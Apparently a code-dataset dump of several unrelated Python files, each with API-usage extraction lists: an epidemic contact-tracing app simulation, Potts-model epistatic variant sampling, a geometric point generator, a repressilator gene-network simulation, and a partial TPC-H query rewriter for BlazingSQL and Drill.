""" Assess all encounters made by i in one day | Détermine toutes les rencontres faites par i en un jour """
for edge in graph.adj[i]:
j = edge['node']
if j < i:
continue # only check one way of the edge | on ne regarde qu'un sens de chaque arête
# if i and/or j are in quarantine, reduce the probability that they meet | si i et/ou j sont confinés, réduction de leur proba de rencontre
factor = 1
if graph.individuals[i].in_quarantine():
factor *= quarantineFactor
if graph.individuals[j].in_quarantine():
factor *= quarantineFactor
if random.random() < edge['proba'] / factor:
if random.random() < pCloseContact: # if this is a close contact
# if i and j have the app, we save their encounter | si i et j ont l'appli, on note la rencontre
if graph.individuals[i].app and graph.individuals[j].app and random.random() < pDetection: # contact detections are symmetric in our model
graph.encounters[i][-1].append(j)
graph.encounters[j][-1].append(i)
contamination(graph, i, j, True)
else:
contamination(graph, i, j, False)
def step(graph):
""" Step from a day to the next day | Passage au jour suivant du graphe """
graph.nbTest = 0
for encounter in graph.encounters:
encounter.append([]) # will contain every encounter of the day | contiendra les nouvelles rencontres du jour
graph.contaminations.append(0)
graph.numInfectedByNewInfected.append(0)
## go through each possible encounter | on constate toutes les rencontres entre individus
for i in range(nbIndividuals):
make_encounters(graph, i)
## update the states | on met à jour les états des individus
for i, individual in enumerate(graph.individuals):
if individual.in_state(ASYMP):
if random.random() < pAtoG:
graph.nbAS -= 1
graph.nbCured += 1
individual.state = CURED
elif individual.in_state(PRESYMP):
if individual.daysIncubation == 0: # the person develops symptoms
graph.nbPS -= 1
graph.nbS += 1
individual.state = SYMP
# send the notifications (encounters[i] is empty if i doesn't have the app) | envoi des notifs (encounters[i] vide si i n'a pas l'appli)
if random.random() < pReport and warningAfterSymptoms:
send_notification(graph, i)
if random.random() < pQSymptoms: # go into quarantine if symptoms appear | mise en confinement à la détection des symptômes
individual.go_quarantine()
test_individual(individual, graph) # all individuals developing symptoms are tested (TODO: add prob. to parameters ?)
elif individual.in_state(SYMP):
action = random.random()
if action < pIStoC:
graph.nbS -= 1
graph.nbCured += 1
individual.state = CURED
elif action > 1 - pIStoD:
graph.nbS -= 1
graph.nbDead += 1
individual.state = DEAD
# if warningAfterSymptoms is True, each individual has a probability of sending a false notification due to symptoms that are misinterpreted as from COVID-19
# | si warningAfterSymptoms est vrai, chaque individu a une probabilité d'envoyer une notification en raison de symptômes faussement perçus comme relevant du COVID-19
if warningAfterSymptoms and random.random() < pSymptomsNotCovid:
send_notification(graph, i)
# reception of test results | réception des résultats de test
if individual.timeLeftForTestResult == 0:
if individual.in_quarantine() and individual.latestTestResult == False: # is in quarantine and gets a negative test
individual.daysQuarantine = 0 # end of quarantine
if individual.latestTestResult == True:
individual.go_quarantine()
individual.timeLeftForTestResult = np.inf # people tested positive are not tested again
if random.random() < pReport: # not everyone reports a positive test to the app
send_notification(graph, i)
individual.app = False # unsubscribe from the app in order to not consider new notifications
individual.timeLeftForTestResult -= 1
## results of the day | bilan du jour
graph.nbQuarantineNonI = 0
graph.nbQuarantineI = 0
for individual in graph.individuals:
if individual.in_state(DEAD):
continue
individual.daysQuarantine -= 1
individual.daysIncubation -= 1
individual.timeSinceLastTest += 1
# if there are still symptoms we don't end the quarantine
if (not individual.in_quarantine()) and individual.in_state(SYMP):
individual.daysQuarantine = 1
if individual.in_quarantine():
graph.nbQuarantineTotal += 1/nbIndividuals
if not individual.is_infected():
graph.nbQuarantineNonI += 1
else:
graph.nbQuarantineI += 1
if individual.timeSinceInfection >= 0:
individual.timeSinceInfection += 1
## deleting oldest recorded day | suppression du plus vieux jour de l'historique
for encounter in graph.encounters:
encounter.pop(0)
graph.stepNb += 1
# # Display
# Interactive model below (it takes about 10-15 sec to appear and to run a simulation)
# ! uncomment for the notebook version :
# %matplotlib notebook
import matplotlib.pyplot as plt
fig, ((ax, ax2), (ax3, ax4)) = plt.subplots(2, 2, figsize=[15,10])
axRt = ax3.twinx()
xs = []
y_D = []
y_MS = []
y_MPS = []
y_MAS = []
y_S = []
y_G = []
y_Q = []
y_InfectByASPS = []
y_QuarantineNonI = []
y_QuarantineI = []
y_QuarantineNonITotal = []
y_Test = []
y_TestTotal = []
y_Rt = []
ax.set_ylim([0, nbIndividuals])
def update_viz(graph):
if y_QuarantineNonITotal != []:
y_QuarantineNonITotal.append((graph.nbQuarantineNonI + nbIndividuals*y_QuarantineNonITotal[-1])/nbIndividuals)
y_TestTotal.append((graph.nbTest + nbIndividuals*y_TestTotal[-1])/nbIndividuals)
else:
y_QuarantineNonITotal.append(graph.nbQuarantineNonI/nbIndividuals)
y_TestTotal.append(graph.nbTest/nbIndividuals)
xs.append(len(xs))
y_D.append(graph.nbDead/nbIndividuals*100)
y_MS.append(graph.nbS/nbIndividuals*100)
y_MPS.append(graph.nbPS/nbIndividuals*100)
y_MAS.append(graph.nbAS/nbIndividuals*100)
y_S.append(graph.nbHealthy/nbIndividuals*100)
y_G.append(graph.nbCured/nbIndividuals*100)
y_Q.append(graph.nbQuarantineTotal)
y_InfectByASPS.append(graph.nbInfectedByASPS)
y_QuarantineNonI.append(graph.nbQuarantineNonI/nbIndividuals*100)
y_QuarantineI.append(graph.nbQuarantineI/nbIndividuals*100)
y_Test.append(graph.nbTest/nbIndividuals*100)
def draw_viz(graph):
ax.clear()
ax2.clear()
ax3.clear()
ax4.clear()
axRt.clear()
ax.set_xlabel("Days")
ax2.set_xlabel("Days")
ax3.set_xlabel("Days")
ax4.set_xlabel("Days")
# computing Rt | calcul de Rt
for i in range(graph.stepNb):
if graph.contaminations[i] != 0 and graph.contaminations[i] > 5: # we just take into account days where there were more than 5 contaminations to reduce random fluctuations
y_Rt.append(graph.numInfectedByNewInfected[i]/graph.contaminations[i])
else:
y_Rt.append(0)
for i in range(1, graph.stepNb-1): # smoothing Rt curve
if y_Rt[i] == 0:
y_Rt[i] = (y_Rt[i-1] + y_Rt[i+1])/2
labels = [ "Symptomatic", "Deceased", "Asymptomatic","Presymptomatic", "Cured", "Healthy"]
ax.stackplot(xs, y_MS, y_D, y_MAS,y_MPS, y_G, y_S, labels=labels, edgecolor="black", colors=["red", "darkred", "orange","yellow", "dodgerblue", "mediumseagreen"])
ax.set_ylabel("Proportion of the population")
labels2 = ["In quarantine and non infected (percentage)", "In quarantine and infected (percentage)"]
ax2.stackplot(xs, y_QuarantineNonI, y_QuarantineI, labels=labels2)
ax2.set_ylabel("Proportion of the population")
#line, = ax3.plot(xs, y_InfectByASPS)
#line.set_label("Total infections by asympt.")
ax3.set_ylabel("Quarantine days / Tests")
line, = ax3.plot(xs, y_Q)
line.set_label("Cumulative quarantine days per person")
line, = ax3.plot(xs, y_QuarantineNonITotal)
line.set_label("Cumulative quarantine days of healthy people per person")
line, = ax3.plot(xs, y_TestTotal)
line.set_label("Cumulative number of tests per person")
axRt.set_ylabel("Rt", color = 'red')
line, = axRt.plot(xs, y_Rt, color = 'red')
line.set_label("Rt (average number of infections caused by one infected)")
line, = ax4.plot(xs, y_Test)
line.set_label("Number of tests (in percentage of population)")
ax4.set_ylabel("Tests")
ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=3)
ax2.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=1)
#ax3.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=1)
ax3.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=2)
#axRt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=1) #to avoid legend on top of the other
ax4.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), shadow=True, ncol=2)
plt.tight_layout()
def update_prob(app_use_rate, report_to_app, read_notif, warning_after_symptoms, quarantine_after_notification):
global nbIndividuals
global utilApp
global pReport
global pReadNotif
global quarantineAfterNotification
global warningAfterSymptoms
global xs, y_D, y_MS, y_MPS, y_MAS, y_S, y_G, y_Q, y_InfectByASPS, y_Rt
global y_QuarantineNonI, y_QuarantineNonITotal, y_QuarantineI, y_Test, y_TestTotal
# TODO: clarify/simplify ?
utilApp = app_use_rate
pReport = report_to_app
pReadNotif = read_notif
warningAfterSymptoms = warning_after_symptoms
quarantineAfterNotification = quarantine_after_notification
nbSteps = 60
nbIndividuals = 4000 # you may change the number of individuals for the exponential distribution graph here
graph = Graph()
init_graph_household(graph) # default graph generation using households structure, as shown in the Results section
# uncomment this to get a graph with degrees following an exponential distribution
#init_graph_exp(graph)
xs.clear()
y_D.clear()
y_MS.clear()
y_MPS.clear()
y_MAS.clear()
y_S.clear()
y_G.clear()
y_Q.clear()
y_InfectByASPS.clear()
y_QuarantineNonI.clear()
y_QuarantineNonITotal.clear()
y_QuarantineI.clear()
y_Test.clear()
y_TestTotal.clear()
y_Rt.clear()
maxSymp = 0
for step_ind in range(nbSteps):
# update matplotlib
update_viz(graph)
# update simulation
step(graph)
print(f'Progress : {(100*step_ind/nbSteps):.1f} %')
maxSymp = max(maxSymp, graph.nbS)
# print("Total individuals:", nbIndividuals)
# print("Number of deceased:", graph.nbDead)
# print("Max. nb of symptomatic people:", maxSymp)
# print("Test per people:", y_TestTotal[-1])
# print("Final healthy:", y_S[-1])
print(maxSymp/nbIndividuals,",", y_S[-1],",", y_Q[-1], ",", y_TestTotal[-1])
draw_viz(graph)
plt.show()
update_prob(utilApp, pReport, pReadNotif, warningAfterSymptoms, quarantineAfterNotification)
# interact_manual(update_prob, \
# app_use_rate = widgets.FloatSlider(min=0.0, max=1.0, step=0.01, value=utilApp), \
# report_to_app = widgets.FloatSlider(min=0.0, max=1.0, step=0.01, value=pReport), \
# read_notif = widgets.FloatSlider(min=0.0, max=1.0, step=0.01, value=pReadNotif), \
# warning_after_symptoms = widgets.Checkbox(value=warningAfterSymptoms), \
# quarantine_after_notification = widgets.Checkbox(value=quarantineAfterNotification))
|
[
"matplotlib.pyplot.show",
"random.randint",
"random.uniform",
"numpy.random.exponential",
"matplotlib.pyplot.subplots",
"random.random",
"matplotlib.pyplot.tight_layout",
"numpy.random.lognormal"
] |
[((23541, 23577), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '[15, 10]'}), '(2, 2, figsize=[15, 10])\n', (23553, 23577), True, 'import matplotlib.pyplot as plt\n'), ((27386, 27404), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (27402, 27404), True, 'import matplotlib.pyplot as plt\n'), ((29363, 29373), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (29371, 29373), True, 'import matplotlib.pyplot as plt\n'), ((10860, 10875), 'random.random', 'random.random', ([], {}), '()\n', (10873, 10875), False, 'import random\n'), ((11860, 11905), 'numpy.random.exponential', 'np.random.exponential', (['deg_avg', 'nbIndividuals'], {}), '(deg_avg, nbIndividuals)\n', (11881, 11905), True, 'import numpy as np\n'), ((12973, 13025), 'random.randint', 'random.randint', (['household_size[0]', 'household_size[1]'], {}), '(household_size[0], household_size[1])\n', (12987, 13025), False, 'import random\n'), ((10722, 10742), 'random.uniform', 'random.uniform', (['(0)', '(1)'], {}), '(0, 1)\n', (10736, 10742), False, 'import random\n'), ((16756, 16771), 'random.random', 'random.random', ([], {}), '()\n', (16769, 16771), False, 'import random\n'), ((18402, 18417), 'random.random', 'random.random', ([], {}), '()\n', (18415, 18417), False, 'import random\n'), ((17320, 17335), 'random.random', 'random.random', ([], {}), '()\n', (17333, 17335), False, 'import random\n'), ((18459, 18474), 'random.random', 'random.random', ([], {}), '()\n', (18472, 18474), False, 'import random\n'), ((19710, 19725), 'random.random', 'random.random', ([], {}), '()\n', (19723, 19725), False, 'import random\n'), ((21401, 21416), 'random.random', 'random.random', ([], {}), '()\n', (21414, 21416), False, 'import random\n'), ((11229, 11244), 'random.random', 'random.random', ([], {}), '()\n', (11242, 11244), False, 'import random\n'), ((15466, 15481), 'random.random', 'random.random', ([], {}), '()\n', (15479, 15481), False, 'import random\n'), ((20725, 20740), 'random.random', 'random.random', ([], {}), '()\n', (20738, 20740), False, 'import random\n'), ((22013, 22028), 'random.random', 'random.random', ([], {}), '()\n', (22026, 22028), False, 'import random\n'), ((11390, 11435), 'numpy.random.lognormal', 'np.random.lognormal', (['incubMeanlog', 'incubSdlog'], {}), '(incubMeanlog, incubSdlog)\n', (11409, 11435), True, 'import numpy as np\n'), ((14640, 14655), 'random.random', 'random.random', ([], {}), '()\n', (14653, 14655), False, 'import random\n'), ((14743, 14758), 'random.random', 'random.random', ([], {}), '()\n', (14756, 14758), False, 'import random\n'), ((15727, 15772), 'numpy.random.lognormal', 'np.random.lognormal', (['incubMeanlog', 'incubSdlog'], {}), '(incubMeanlog, incubSdlog)\n', (15746, 15772), True, 'import numpy as np\n'), ((18711, 18726), 'random.random', 'random.random', ([], {}), '()\n', (18724, 18726), False, 'import random\n'), ((20360, 20375), 'random.random', 'random.random', ([], {}), '()\n', (20373, 20375), False, 'import random\n'), ((20241, 20256), 'random.random', 'random.random', ([], {}), '()\n', (20254, 20256), False, 'import random\n')]
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import Counter
import itertools
from typing import Optional, Iterable, Tuple, List
import numpy as np
import potts_model
import utils
def combine_k_rounds(num_rounds: int, mutations: Iterable[Tuple[Tuple[int, int], ...]]) -> List[Tuple[Tuple[int, int], ...]]:
"""Return the result of combining `mutations` for `num_rounds`.
Starting with a pool of M `mutations` m_1 ... m_M, stack them for K=`num_rounds` rounds. For example,
for K=3 rounds of combination, this will result in every variant (m_i + m_j + m_k), for i, j, k \\in M.
Be careful of memory usage, as this can be very large due to combinatorial possibilities.
In the best case, this scales with {M \\choose K}. But if mutations overlap at P positions,
combining them produces 1 + 2^{P} variants. So in the worst case, this will produce
{M \\choose K} * 2^{P} variants. See the definition for `utils.merge_mutation_sets` for more on
mutation merging.
Args:
num_rounds: The number of rounds of combination
mutations: The starting pool of mutations, where each mutation is an iterable of
tuples encoding mutations (position, mutation).
Returns:
A list of tuples of mutations, where each element will be a combination of
`num_rounds` mutations from `mutations`. Note that each tuple will possibly be of different lengths.
"""
if num_rounds == 0:
return list(mutations)
mutation_combinations = itertools.combinations(mutations, num_rounds + 1)
all_samples = []
for mutation_combination in mutation_combinations:
all_samples.extend(utils.merge_multiple_mutation_sets(mutation_combination))
return all_samples
def filter_mutation_set_by_position(mutation_sets: Iterable[Tuple[Tuple[int, int], ...]], limit: int = 10):
"""Return a filtered mutation set, where each position is used a maximum of `limit` times."""
filtered_mutation_sets = []
position_counter = Counter()
for mutation_set in mutation_sets:
positions = [m[0] for m in mutation_set]
if any([position_counter[position] >= limit for position in positions]):
continue
else:
position_counter.update(positions)
filtered_mutation_sets.append(mutation_set)
return filtered_mutation_sets
def get_epistatic_seqs_for_landscape(landscape: potts_model.PottsModel,
distance: int,
n: int,
adaptive: bool = True,
max_reuse: Optional[int] = None,
top_k: Optional[int] = None,
random_state: np.random.RandomState = np.random.RandomState(0)
) -> List[np.ndarray]:
"""Return `n` variants at `distance` that are enriched for epistasis on `landscape`.
To construct epistatic sequences, the top epistatic pairs are taken directly from the landscape
epistasis tensor, and used as building blocks for higher order mutants. If `max_reuse` is set, the
top epistatic pairs are filtered greedily to only reuse the same positions `max_reuse` times.
Args:
landscape: The landscape.
distance: The number of mutations from the landscape wildtype. Raises a ValueError if not an even number.
n: The number of variants in the test set.
adaptive: When True (False), return sequences enriched for adaptive (deleterious) epistasis
max_reuse: An integer indicating the maximum number of times a position can be reused in the starting pool
of epistatic pairs.
top_k: The number of highest magnitude interactions to use for sampling. All epistatic pairs included in the
resulting variants are guaranteed to be within the `top_k` highest magnitude.
random_state: An instance of np.random.RandomState
Return:
A List of sequences.
"""
if distance % 2 != 0:
raise ValueError('Odd distance not supported.')
if not top_k:
top_k = n
mutation_pairs = utils.get_top_n_mutation_pairs(landscape.epistasis_tensor, top_k, lowest=not adaptive)
if max_reuse is not None:
assert max_reuse > 0
mutation_pairs = filter_mutation_set_by_position(mutation_pairs, limit=max_reuse)
print(f'{len(mutation_pairs)} after filtering {top_k}')
num_rounds = distance // 2
all_combined = combine_k_rounds(num_rounds, mutation_pairs)
all_combined = [element for element in all_combined if len(element) == distance]
if len(all_combined) < n:
raise ValueError(f'Not enough ({len(all_combined)} < {n}) mutants at distance {distance}, try increasing `top_k`.')
# TODO(nthomas) after switching to np.random.Generator, we can do rng.choice(all_combined)
subset_idxs = random_state.choice(len(all_combined), n, replace=False)
subset = [all_combined[i] for i in subset_idxs]
seqs = [utils.apply_mutations(landscape.wildtype_sequence, m) for m in subset]
return seqs
|
[
"utils.apply_mutations",
"numpy.random.RandomState",
"utils.merge_multiple_mutation_sets",
"itertools.combinations",
"collections.Counter",
"utils.get_top_n_mutation_pairs"
] |
[((2032, 2081), 'itertools.combinations', 'itertools.combinations', (['mutations', '(num_rounds + 1)'], {}), '(mutations, num_rounds + 1)\n', (2054, 2081), False, 'import itertools\n'), ((2514, 2523), 'collections.Counter', 'Counter', ([], {}), '()\n', (2521, 2523), False, 'from collections import Counter\n'), ((3273, 3297), 'numpy.random.RandomState', 'np.random.RandomState', (['(0)'], {}), '(0)\n', (3294, 3297), True, 'import numpy as np\n'), ((4589, 4680), 'utils.get_top_n_mutation_pairs', 'utils.get_top_n_mutation_pairs', (['landscape.epistasis_tensor', 'top_k'], {'lowest': '(not adaptive)'}), '(landscape.epistasis_tensor, top_k, lowest=\n not adaptive)\n', (4619, 4680), False, 'import utils\n'), ((5425, 5478), 'utils.apply_mutations', 'utils.apply_mutations', (['landscape.wildtype_sequence', 'm'], {}), '(landscape.wildtype_sequence, m)\n', (5446, 5478), False, 'import utils\n'), ((2178, 2234), 'utils.merge_multiple_mutation_sets', 'utils.merge_multiple_mutation_sets', (['mutation_combination'], {}), '(mutation_combination)\n', (2212, 2234), False, 'import utils\n')]
|
import numpy as np
def cubic_lattice(N):
array = np.arange(N)
xs, ys, zs = np.meshgrid(array, array, array)
return np.vstack((xs.flatten(), ys.flatten(), zs.flatten())).T
def donut(inner_r, outer_r, height=5, point_density=24, n_viewpoints=60,
offset=1e-3):
assert(isinstance(height, int))
assert(outer_r > inner_r)
# generate points on the xz-plane
def round_points(thetas):
return np.vstack([
np.cos(thetas),
np.zeros(thetas.shape[0]),
np.sin(thetas)
]).T
def rings(level_y):
thetas = np.linspace(0, 2 * np.pi, point_density + 1)[:-1]
inner = inner_r * round_points(thetas)
outer = outer_r * round_points(thetas)
inner[:, 1] = level_y
outer[:, 1] = level_y
return np.vstack((inner, outer))
point_ys = np.arange(height)
points = np.vstack([rings(level_y) for level_y in point_ys])
camera_r = (inner_r + outer_r) / 2.
camera_y = (point_ys[0] + point_ys[-1]) / 2.
# add offset to avoid division by zero at projection
thetas = np.linspace(0, 2 * np.pi, n_viewpoints + 1)[:-1] + offset
camera_locations = camera_r * round_points(thetas)
camera_locations[:, 1] = camera_y
camera_omegas = np.vstack((
np.zeros(n_viewpoints),
-thetas,
np.zeros(n_viewpoints)
)).T
return camera_omegas, camera_locations, points
|
[
"numpy.meshgrid",
"numpy.zeros",
"numpy.sin",
"numpy.arange",
"numpy.linspace",
"numpy.cos",
"numpy.vstack"
] |
[((55, 67), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (64, 67), True, 'import numpy as np\n'), ((85, 117), 'numpy.meshgrid', 'np.meshgrid', (['array', 'array', 'array'], {}), '(array, array, array)\n', (96, 117), True, 'import numpy as np\n'), ((856, 873), 'numpy.arange', 'np.arange', (['height'], {}), '(height)\n', (865, 873), True, 'import numpy as np\n'), ((814, 839), 'numpy.vstack', 'np.vstack', (['(inner, outer)'], {}), '((inner, outer))\n', (823, 839), True, 'import numpy as np\n'), ((595, 639), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(point_density + 1)'], {}), '(0, 2 * np.pi, point_density + 1)\n', (606, 639), True, 'import numpy as np\n'), ((1100, 1143), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(n_viewpoints + 1)'], {}), '(0, 2 * np.pi, n_viewpoints + 1)\n', (1111, 1143), True, 'import numpy as np\n'), ((1292, 1314), 'numpy.zeros', 'np.zeros', (['n_viewpoints'], {}), '(n_viewpoints)\n', (1300, 1314), True, 'import numpy as np\n'), ((1341, 1363), 'numpy.zeros', 'np.zeros', (['n_viewpoints'], {}), '(n_viewpoints)\n', (1349, 1363), True, 'import numpy as np\n'), ((458, 472), 'numpy.cos', 'np.cos', (['thetas'], {}), '(thetas)\n', (464, 472), True, 'import numpy as np\n'), ((486, 511), 'numpy.zeros', 'np.zeros', (['thetas.shape[0]'], {}), '(thetas.shape[0])\n', (494, 511), True, 'import numpy as np\n'), ((525, 539), 'numpy.sin', 'np.sin', (['thetas'], {}), '(thetas)\n', (531, 539), True, 'import numpy as np\n')]
|
# example-3.18-repressilator.py - Transcriptional regulation
# RMM, 29 Aug 2021
#
# Figure 3.26: The repressilator genetic regulatory network. (a) A schematic
# diagram of the repressilator, showing the layout of the genes in the
# plasmid that holds the circuit as well as the circuit diagram
# (center). (b) A simulation of a simple model for the repressilator,
# showing the oscillation of the individual protein concentrations.
#
import control as ct
import numpy as np
import matplotlib.pyplot as plt
#
# Repressilator dynamics
#
# This function implements the basic model of the repressilator All
# parameter values were taken from Nature. 2000 Jan 20; 403(6767):335-8.
#
# This model was developed by members of the 2003 Synthetic Biology Class
# on Engineered Blinkers.
#
# Dynamics for the repressilator
def repressilator(t, x, u, params):
# store the state variables under more meaningful names
mRNA_cI = x[0]
mRNA_lacI = x[1]
mRNA_tetR = x[2]
protein_cI = x[3]
protein_lacI = x[4]
protein_tetR = x[5]
#
# set the parameter values
#
# set the max transcription rate in transcripts per second
k_transcription_cI = params.get('k_transcription_cI', 0.5)
k_transcription_lacI = params.get('k_transcription_lacI', 0.5)
k_transcription_tetR = params.get('k_transcription_tetR', 0.5)
# set the leakage transcription rate (ie transcription rate if
# promoter region bound by repressor) in transcripts per second
k_transcription_leakage = params.get('k_transcription_leakage', 5e-4)
# Set the mRNA and protein degradation rates (per second)
mRNA_half_life = params.get('mRNA_half_life', 120) # in seconds
k_mRNA_degradation = np.log(2)/mRNA_half_life
protein_half_life = params.get('protein_half_life', 600) # in seconds
k_protein_degradation = np.log(2)/protein_half_life
# proteins per transcript lifespan
translation_efficiency = params.get('translation_efficiency', 20)
average_mRNA_lifespan = 1/k_mRNA_degradation
# proteins per transcript per sec
k_translation = translation_efficiency/average_mRNA_lifespan
# set the Hill coefficients of the repressors
n_tetR = params.get('n_tetR', 2)
n_cI = params.get('n_cI', 2)
n_lacI = params.get('n_lacI', 2)
# Set the dissociation constant for the repressors to their target promoters
# in per molecule per second
KM_tetR = params.get('KM_tetR', 40)
KM_cI = params.get('KM_cI', 40)
KM_lacI = params.get('KM_lacI', 40)
# the differential equations governing the state variables:
# mRNA concentration = transcription given repressor concentration -
# mRNA degradation + transcription leakage
dxdt = np.empty(6)
dxdt[0] = k_transcription_cI/(1 + (protein_tetR / KM_tetR) ** n_tetR) - \
k_mRNA_degradation * mRNA_cI + k_transcription_leakage
dxdt[1] = k_transcription_lacI/(1 + (protein_cI / KM_cI)**n_cI) - \
k_mRNA_degradation * mRNA_lacI + k_transcription_leakage
dxdt[2] = k_transcription_tetR/(1 + (protein_lacI / KM_lacI) ** n_lacI) - \
k_mRNA_degradation * mRNA_tetR + k_transcription_leakage
# protein concentration = translation - protein degradation
dxdt[3] = k_translation*mRNA_cI - k_protein_degradation*protein_cI
dxdt[4] = k_translation*mRNA_lacI - k_protein_degradation*protein_lacI
dxdt[5] = k_translation*mRNA_tetR - k_protein_degradation*protein_tetR
return dxdt
# Define the system as an I/O system
sys = ct.NonlinearIOSystem(
updfcn=repressilator, outfcn=lambda t, x, u, params: x[3:],
states=6, inputs=0, outputs=3)
# Set up the plotting grid to match the layout in the book
fig = plt.figure(constrained_layout=True)
gs = fig.add_gridspec(2, 2)
#
# (b) A simulation of a simple model for the repressilator, showing the
# oscillation of the individual protein concentrations.
#
fig.add_subplot(gs[0, 1]) # first row, second column
# Initial conditions and time
t = np.linspace(0, 20000, 1000)
x0 = [1, 0, 0, 200, 0, 0]
# Integrate the differential equation
response = ct.input_output_response(sys, t, 0, x0)
# Plot the results (protein concentrations)
plt.plot(response.time/60, response.outputs[0], '-')
plt.plot(response.time/60, response.outputs[1], '--')
plt.plot(response.time/60, response.outputs[2], '-.')
plt.axis([0, 300, 0, 5000])
plt.legend(("cI", "lacI", "tetR"), loc='upper right')
plt.xlabel("Time [min]") # Axis labels
plt.ylabel("Proteins per cell")
plt.title("Repressilator simulation") # Plot title
# Save the figure
plt.savefig("figure-3.26-repressilator_dynamics.png", bbox_inches='tight')
|
[
"matplotlib.pyplot.title",
"control.NonlinearIOSystem",
"numpy.log",
"matplotlib.pyplot.plot",
"numpy.empty",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.axis",
"matplotlib.pyplot.figure",
"numpy.linspace",
"control.input_output_response",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.savefig"
] |
[((3513, 3629), 'control.NonlinearIOSystem', 'ct.NonlinearIOSystem', ([], {'updfcn': 'repressilator', 'outfcn': '(lambda t, x, u, params: x[3:])', 'states': '(6)', 'inputs': '(0)', 'outputs': '(3)'}), '(updfcn=repressilator, outfcn=lambda t, x, u, params: x\n [3:], states=6, inputs=0, outputs=3)\n', (3533, 3629), True, 'import control as ct\n'), ((3700, 3735), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'constrained_layout': '(True)'}), '(constrained_layout=True)\n', (3710, 3735), True, 'import matplotlib.pyplot as plt\n'), ((3992, 4019), 'numpy.linspace', 'np.linspace', (['(0)', '(20000)', '(1000)'], {}), '(0, 20000, 1000)\n', (4003, 4019), True, 'import numpy as np\n'), ((4096, 4135), 'control.input_output_response', 'ct.input_output_response', (['sys', 't', '(0)', 'x0'], {}), '(sys, t, 0, x0)\n', (4120, 4135), True, 'import control as ct\n'), ((4181, 4235), 'matplotlib.pyplot.plot', 'plt.plot', (['(response.time / 60)', 'response.outputs[0]', '"""-"""'], {}), "(response.time / 60, response.outputs[0], '-')\n", (4189, 4235), True, 'import matplotlib.pyplot as plt\n'), ((4234, 4289), 'matplotlib.pyplot.plot', 'plt.plot', (['(response.time / 60)', 'response.outputs[1]', '"""--"""'], {}), "(response.time / 60, response.outputs[1], '--')\n", (4242, 4289), True, 'import matplotlib.pyplot as plt\n'), ((4288, 4343), 'matplotlib.pyplot.plot', 'plt.plot', (['(response.time / 60)', 'response.outputs[2]', '"""-."""'], {}), "(response.time / 60, response.outputs[2], '-.')\n", (4296, 4343), True, 'import matplotlib.pyplot as plt\n'), ((4343, 4370), 'matplotlib.pyplot.axis', 'plt.axis', (['[0, 300, 0, 5000]'], {}), '([0, 300, 0, 5000])\n', (4351, 4370), True, 'import matplotlib.pyplot as plt\n'), ((4371, 4424), 'matplotlib.pyplot.legend', 'plt.legend', (["('cI', 'lacI', 'tetR')"], {'loc': '"""upper right"""'}), "(('cI', 'lacI', 'tetR'), loc='upper right')\n", (4381, 4424), True, 'import matplotlib.pyplot as plt\n'), ((4426, 4450), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Time [min]"""'], {}), "('Time [min]')\n", (4436, 4450), True, 'import matplotlib.pyplot as plt\n'), ((4488, 4519), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Proteins per cell"""'], {}), "('Proteins per cell')\n", (4498, 4519), True, 'import matplotlib.pyplot as plt\n'), ((4520, 4557), 'matplotlib.pyplot.title', 'plt.title', (['"""Repressilator simulation"""'], {}), "('Repressilator simulation')\n", (4529, 4557), True, 'import matplotlib.pyplot as plt\n'), ((4600, 4674), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""figure-3.26-repressilator_dynamics.png"""'], {'bbox_inches': '"""tight"""'}), "('figure-3.26-repressilator_dynamics.png', bbox_inches='tight')\n", (4611, 4674), True, 'import matplotlib.pyplot as plt\n'), ((2731, 2742), 'numpy.empty', 'np.empty', (['(6)'], {}), '(6)\n', (2739, 2742), True, 'import numpy as np\n'), ((1723, 1732), 'numpy.log', 'np.log', (['(2)'], {}), '(2)\n', (1729, 1732), True, 'import numpy as np\n'), ((1853, 1862), 'numpy.log', 'np.log', (['(2)'], {}), '(2)\n', (1859, 1862), True, 'import numpy as np\n')]
|
import argparse
import re
import sys
import numpy as np
import pandas as pd
import tpch
from pydrill.client import PyDrill
def get_table_occurrences(query):
# [ y for y in a if y not in b]
return [name for name in tpch.tableNames if name in query.split()]
def replace_all(text, dic):
for i, j in dic.items():
text = re.sub(r"\s%s(\s|$)" % i, j, text)
return text
def get_blazingsql_query(db_name, query):
new_query = query
for table_name in get_table_occurrences(query):
new_query = replace_all(
new_query,
{table_name: " %(table)s "
% {"table": db_name + "." + table_name}},
)
return new_query
def get_drill_query(query):
new_query = query
for table_name in get_table_occurrences(query):
new_query = replace_all(
new_query,
{table_name: " dfs.tmp.`%(table)s` " % {"table": table_name}}
)
return new_query
def get_reference_input(drill, root_path, test_name, query):
table_names = get_table_occurrences(query)
table_inputs = []
for table_name in table_names:
file_path = root_path + table_name + ".psv"
table = tpch.tables[table_name]
db_name = "main"
table_inputs.append(
"""{
"dbName": "%(db_name)s",
"tableName": "%(table_name)s",
"filePath": "%(file_path)s",
"columnNames": %(column_names)s,
"columnTypes": %(column_types)s
}"""
% {
"db_name": db_name,
